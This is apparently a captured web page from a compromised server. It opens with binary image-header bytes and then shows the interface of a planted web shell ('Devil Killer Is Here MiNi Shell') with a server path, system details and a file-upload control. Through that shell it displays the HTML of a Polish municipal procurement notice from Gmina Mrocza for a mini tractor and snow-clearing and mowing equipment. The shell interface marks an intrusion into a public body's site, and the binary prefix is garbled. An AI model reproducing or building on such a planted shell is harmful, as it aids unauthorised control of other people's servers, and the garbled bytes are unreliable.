JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250310/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250310/0013796401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup ciągnika rolniczego (mini) wraz z maszynami do prac komunalnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MROCZA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Komórka ZP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350889</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac 1 Maja 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mrocza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-115</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mrocza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mrocza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup ciągnika rolniczego (mini) wraz z maszynami do prac komunalnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f77d0a6-863f-4fc3-8282-b0808fb162cd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00137964</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00029077/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup ciągnika rolniczego (mini) wraz z maszynami do prac komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mrocza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a Wykonawcą, <br/>z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/> Komunikacja za pośrednictwem platformy zakupowej dostępnej pod adresem:<br/> https://platformazakupowa.pl/pn/mrocza</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa<br/> w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza<br/> się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/> Ofertę, a także oświadczenia o jakich mowa w rozdz. XII pkt 8 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub<br/> w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za pomocą platformazakupowa.pl (dalej<br/> jako „Platforma”), dostępną pod adresem: https://platformazakupowa.pl/pn/mrocza i formularza „Wyślij wiadomość do<br/> zamawiającego” dostępnego na stronie dotyczącej danego postepowania (nie dotyczy składania ofert).<br/> W sytuacjach awaryjnych np. w przypadku niedziałania Platformy, Zamawiający dopuszcza komunikację za pomocą poczty<br/> elektronicznej na adres: zamówienia@mrocza.pl (nie dotyczy składania ofert).<br/> Korzystanie z Platformy zakupowej przez Wykonawcę jest bezpłatne.<br/> Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/> sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/> elektronicznej<br/> w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania<br/> sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.:<br/> a. stały dostęp do sieci Internet,<br/> b. komputer klasy PC lub MAC,<br/> c. zainstalowana dowolna przeglądarka internetowa, np. Google Chrome, FireFox z wyłączeniem Internet Explorer,<br/> d. włączona obsługa JavaScript,<br/> e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/> f. Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/> g. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/> lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/> Zamawiający zamieści na stronie internetowej https://platformazakupowa.pl/pn/mrocza dokumenty określone w przepisach ustawy<br/> Pzp.<br/> W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/> Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/> dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/> na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/> Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy.<br/> Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie<br/> przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/> Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w<br/> szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/> w zakładce „Wyślij wiadomość do Zamawiającego”).<br/> Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o<br/> wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/> zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/> https://platformazakupowa.pl/strona/45- instrukcje<br/> Z uwagi na ograniczoną liczbę znaków dalsze informacje Zamawiający zawarł w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L 119<br/> z 04.05.2016, str. 1 z późn. zm.), dalej „Rozporządzenie”, informuję, że:<br/> 1) Administratorem Pani/Pana danych osobowych jest Gmina Mrocza, Plac 1 Maja 20, 89-115 Mrocza, tel. 52 386 74 10.<br/> 2) W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/> e-mail: iod@mrocza.pl<br/> 3) Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/> 4) Dane osobowe będą zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z<br/> 2023 r. poz. 1605 ze zm.), zwanej dalej Pzp, przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/> zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/> 5) Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z art. 19 ustawy z dnia z dnia 11<br/> września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.).<br/> 6) Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/> art. 18 oraz art. 74 ust. 4 PZP.<br/> 7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/> określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/> niepodania określonych danych wynikają z PZP.<br/> 8) Osoba, której dane dotyczą ma prawo do:- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/> organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/> 9) Osobie, której dane dotyczą nie przysługuje:- prawo do usunięcia danych osobowych na podstawie art. 17 ust. 3 lit. b, d lub e Rozporządzenia;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;- prawo sprzeciwu, wobec przetwarzania danych osobowych na podstawie art. 21 Rozporządzenia, gdyż podstawą prawną<br/> przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c Rozporządzenia.<br/> 10) W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/> dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/> sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/> 11) Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/> mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/> konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/> 12) Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/> czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/> 13) W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/> mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane<br/> w drodze żądania skierowanego do Administratora.<br/> Z uwagi na ograniczoną liczbę znaków dalsze informacje Zamawiający zawarł w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.3.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje dostawę ciągnika rolniczego (mini) wraz z maszynami do <br/>prac komunalnych takimi jak: <br/>- pług odśnieżny – lemieszowy, <br/>- posypywarka/rozsiewacz piasku z solą, <br/>- kosiarka bijakowa boczna z przesuwem,<br/><br/>Podstawowe wymagania sprzętowe: <br/>Ciągnik rolniczy (mini) <br/>1) Rok produkcji – ciągnik fabrycznie nowy, rok produkcji co najmniej 2022 lub nowszy, <br/>2) Ciągnik musi spełniać polskie wymogi w zakresie bezpieczeństwa oraz wymagania <br/>poruszania się po drogach publicznych zgodnie z przepisami ustawy z dnia 20 czerwca <br/>1997 r. - Prawo o ruchu drogowym. <br/>3) Dopuszczalna masa własna ciągnika gotowego do pracy max. 1600 kg, <br/>4) Dopuszczalna masa całkowita do 2500 kg, <br/>5) Dopuszczalna masa holowanej przyczepy max. 2500 kg, <br/>6) Silnik: <br/>• wysokoprężny, <br/>• moc co najmniej 32 KM., <br/>• pojemność min. 1250 – max. 1650 cm3, <br/>• chłodzony cieczą, <br/>• spełniający normy min. III A, <br/>• suchy filtr powietrza, <br/>7) Wymiary: <br/>• ciągnik dwuosiowy, <br/>• długość (mm): max. 3500, <br/>• szerokość (mm): max. 1600, <br/>• rozstaw osi (mm) max. 1700, <br/>8) Koła: <br/>• przednie i tylne o profilu przemysłowym, <br/>9) WOM: <br/>• tylny WOM, niezależny, obroty min. 540 obr/min., <br/>• załączanie z kabiny ciągnika, <br/>10) TUZ: <br/>• tylny TUZ, kat. 1, hakowy (zatrzaski) lub kulowy, <br/>• przedni TUZ, kat. 1, hakowy (zatrzaski) lub kulowy, <br/>• zaczep dolny regulowany, <br/>• regulowane ramiona podnośnika, <br/>• sterowanie z kabiny ciągnika, <br/>• regulacja szybkości opadania, <br/>• udźwig na tylnych ramionach min. 600 kg. <br/>11) Układ kierowniczy: <br/>• hydrostatyczny, <br/>• wspomaganie hydrauliczne, <br/>12) Układ napędowy: <br/>• napęd 4 x 4, <br/>• przekładnia hydrostatyczna, 2 zakresowa (jazda przód/tył), <br/>• blokada mechanizmu różnicowego, <br/>13) Układ hamulcowy: <br/>• hamulec postojowy, <br/>• tarczowe mokre, <br/>14) Układ hydrauliczny: <br/>• wydajność pompy min. 30 l/min, <br/>• układ hydrauliczny – otwarty, <br/>• rozdzielacz hydrauliczny min. dwusekcyjny, <br/>• podwójna pompa hydrauliczna, <br/>• łącznie min. 4 pary gniazd hydraulicznych, <br/>• niezależny zbiornik oleju, <br/>15) Kabina homologowana: <br/>• drzwi otwierane z prawej i lewej strony, <br/>• fotel kierowcy regulowany, pneumatyczny, <br/>• wycieraczka i spryskiwacz szyby przedniej, <br/>• ogrzewanie, wentylacja, <br/>• wyposażona w oświetlenie wewnętrzne oraz oświetlenie ostrzegawcze, pulsacyjne, <br/>pomarańczowe – listwa dachowa ledowa na całej długości dachu z napisem UMiG Mrocza, <br/>• 2 lusterka boczne,<br/>• instalacja elektryczna i oświetlenie: <br/>• instalacja nominalna 12 V, <br/>• rozruch silnika rozrusznik – kluczyk, <br/>• gniazdo do instalacji elek. przyczepy, <br/>• min. 2 reflektory przednie, <br/>• min. 2 lampy tylne, <br/>• światła awaryjne, kierunkowskazy, <br/>• wyprowadzone gniazdo elektryczne do zasilania np. pługa (obrysówki), <br/>• zestaw wskaźników (podświetlany), <br/>• licznik motogodzin, <br/>• obrotomierz, <br/>• wskaźnik temperatury, poziomu paliwa, ciśnienia oleju, <br/>• kontrolka świateł awaryjnych, kierunkowskazów, hamulca postojowego, <br/>pracy WOM, <br/>• czujnik obecności operatora w ciągniku, <br/>16) Pozostałe wyposażenie: <br/>• Gaśnica, trójkąt ostrzegawczy, apteczka, <br/>• Zaczep transportowy, <br/>• Zamykane na klucz drzwi, <br/>• Pełna dokumentacja techniczna w języku polskim (instrukcja obsługi), <br/>• Błotniki, <br/>• Ciągnik musi być wyposażony w osprzęt (gniazda hydrauliczne, zaczepy, układy <br/>zawieszenia) umożliwiający pracę z oferowanymi maszynami, <br/>• Ciągnik musi być gotowy do natychmiastowej pracy, <br/><br/>Z uwagi na ograniczoną liczbę znaków pozostałe parametry sprzętu opisano w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16000000-5 - Maszyny rolnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">16700000-2 - Ciągniki</p> <p class="mb-0">16310000-1 - Kosiarki</p> <p class="mb-0">16141000-5 - Rozsiewacze nawozów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które: <br/>1) nie zostaną odrzucone przez Zamawiającego, <br/>2) zostaną wyrażone w PLN. <br/>2. Cena oferty winna być obliczona w następujący sposób: <br/>1) wykonawca określi cenę netto całego zamówienia, <br/>2) wykonawca obliczy w oparciu o pkt 1) wartość podatku VAT, <br/>3) wykonawca zliczy kwoty występujące w pkt 1) tj. cenę netto całego zamówienia oraz w pkt 2) tj. należny podatek VAT od całości zamówienia a następnie poda cenę całości zamówienia (brutto) co będzie stanowić „cenę oferty”, <br/>4) Cena całego zamówienia obejmuje wszystkie koszty związane z realizacją zamówienia. <br/>5) W przypadku rozbieżności w cenie podanej cyframi a podanej słownie, wiążąca będzie cena podana słownie. <br/>3. Opis kryteriów wraz z podaniem znaczenia: <br/>1) cena 60 %, <br/>2) okres dodatkowej gwarancji: 20% <br/>Przez „dodatkową gwarancję” Zamawiający rozumie udzielenie gwarancji na okres powyżej 24 miesięcy, maksymalnie 60 miesięcy na cały sprzęt. Wykonawca zobowiązany jest do wskazania zaproponowanego okresu gwarancji w tych granicach. W przypadku zaproponowania przez Wykonawcę okresu gwarancji większego niż 60 miesięcy oferta oceniona zostanie jak dla 60 miesięcy. W przypadku gdy Wykonawca skróci okres <br/>gwarancji poniżej 24 miesięcy, oferta podlegać będzie odrzuceniu na podstawie art. 226 ust 1 pkt. 5) ustawy PZP. <br/>3) termin dostawy: 20% <br/>Przez „termin dostawy” Zamawiający rozumie określenie ilości miesięcy, licząc od dnia podpisania umowy, w ciągu których zostanie zrealizowane całe zamówienie. Dostawa powinna zostać zrealizowana w okresie do 3 miesięcy od dnia podpisania umowy. <br/>Wykonawca zobowiązany jest do wskazania ilości miesięcy w druku oferty. Zamawiający przyzna dodatkowe punkty za skrócenie terminu realizacji zamówienia od wymaganego określonego w Rozdziale VI. W przypadku gdy Wykonawca skróci termin realizacji poniżej 1 miesiąca, oferta zostanie oceniona, jak dla 1 miesiąca. Jeżeli Wykonawca nie zadeklaruje żadnego terminu realizacji zamówienia w formularzu ofertowym lub zaproponuje termin dłuższy niż 3 miesiące, oferta zostanie odrzucona na podstawie <br/>art. 226 ust 1 pkt. 5) ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres dodatkowej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> 